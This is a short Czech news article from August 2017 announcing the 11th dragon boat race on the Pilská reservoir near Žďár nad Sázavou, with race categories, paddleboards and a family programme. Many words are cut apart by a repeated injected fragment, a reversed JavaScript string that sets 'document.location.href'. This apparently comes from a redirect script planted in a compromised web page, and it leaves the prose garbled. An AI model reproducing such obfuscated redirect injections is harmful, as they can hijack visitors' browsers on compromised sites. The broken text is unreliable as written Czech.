Rainbow page separator

Na Piláku se utkají posádky velkých i malých dračích lodí

Čtvrtek, 17. srpna 2017

Žďár nad Sázavou / Při 11. ročníku tradičního srpnového závodu dračích lodí v sobotu 19. srpna rozčeří hladinu Pilské nádrže téměř čtyři desítky posádek.
Klání pořádané Windsurfing Clubem Velké Dářko, které bude zahájeno v 8.20 hodin, se le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos skládá z klasického závodu na 200 metrů velkých dračích lodí pro dvacet pádlujících a závodu malých lodí s deseti pádlujícími. Soutěž je zařazená do Mistrovství dračích lodí České republiky a Mistrovství ČSDL – Torrsen cup 2017. Na místě bude rovněž možnost otes[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovat velké desetimístné paddleboardy. Na těch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to plavidlech se uskuteční vložený závod při závodu dračích lodí, podmínky budou upřesněny na místě.
Veřejnost, která má vstup na akci zdarma, může také využít vyhlídkové lety vrtulníkem, sledovat seskok dračích paragánů a další spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovní programy, v areálu bude k dispozici i dětský koutek, divadlo pro děti, soutěže, malování na obličej, občerstvení či večerní ohňostroj na téma Fan[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom opery.

Program dračích lodí

Fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to: [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tohalama/“ target=“_blank“ rel=“noopener noreferrer“>www.pho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tohalama.com